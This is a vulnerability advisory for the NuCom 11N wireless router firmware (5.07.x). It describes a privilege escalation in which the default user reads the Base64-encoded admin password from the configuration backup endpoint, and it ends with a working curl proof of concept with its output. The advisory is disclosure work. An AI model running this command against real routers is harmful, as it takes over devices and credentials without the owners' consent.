NuCom 11N Wireless Router 5.07.90 Remote Privilege Escalation

`  
NuCom 11N Wireless Router v5.07.90 Remote Privilege Escalation  
  
  
Vendor: NUEVAS COMUNICACIONES IBERIA, S.A.  
Product web page: https://www.nucom.es  
Affected version: 5.07.90_multi_NCM01  
5.07.89_multi_NCM01  
5.07.72_multi_NCM01  
  
Summary: The NC routers upgrades your network to the next  
generation of WiFi. With combined wireless speeds of up to  
1750 Mbps, the device provides better speeds and wireless  
range. Includes 2 FXS ports for any VoIP service. If you  
prefer a wired connection, the NC routers have gigabit  
ports to provide an incredibly fast, lag-free experience.  
3.0 ports allow you to power a robust home Internet network  
by sharing printers, flash storage, FTP servers, or media  
players.  
  
Desc: The application suffers from a privilege escalation  
vulnerability. The non-privileged default user (user:user)  
can elevate his/her privileges by sending a HTTP GET request  
to the configuration backup endpoint and disclose the http  
super password (admin credentials) in Base64 encoded value.  
Once authenticated as admin, an attacker will be granted  
access to the additional and privileged pages.  
  
Tested on: GoAhead-Webs  
Tenda  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5629  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5629.php  
  
  
01.03.2021  
  
--  
  
  
lqwrm@metalgear:~/prive$ echo -e '\nThe admin password is: ' ; \  
> curl -s http://192.168.0.1:8080/cgi-bin/DownloadNoMacaddrCfg/RouterCfm.cfg?random=0.251 \  
> -H 'Cookie: ecos_pw=dXNlcg==1311930653:language=en' | \  
> grep -oP '(?<=http_supper_passwd=).*' | \  
> base64 -d 2>/dev/null | \  
> xargs echo -n ; \  
> echo -e '\n-----------\n'  
The admin password is:   
MammaMia123  
-----------  
  
lqwrm@metalgear:~/prive$  
`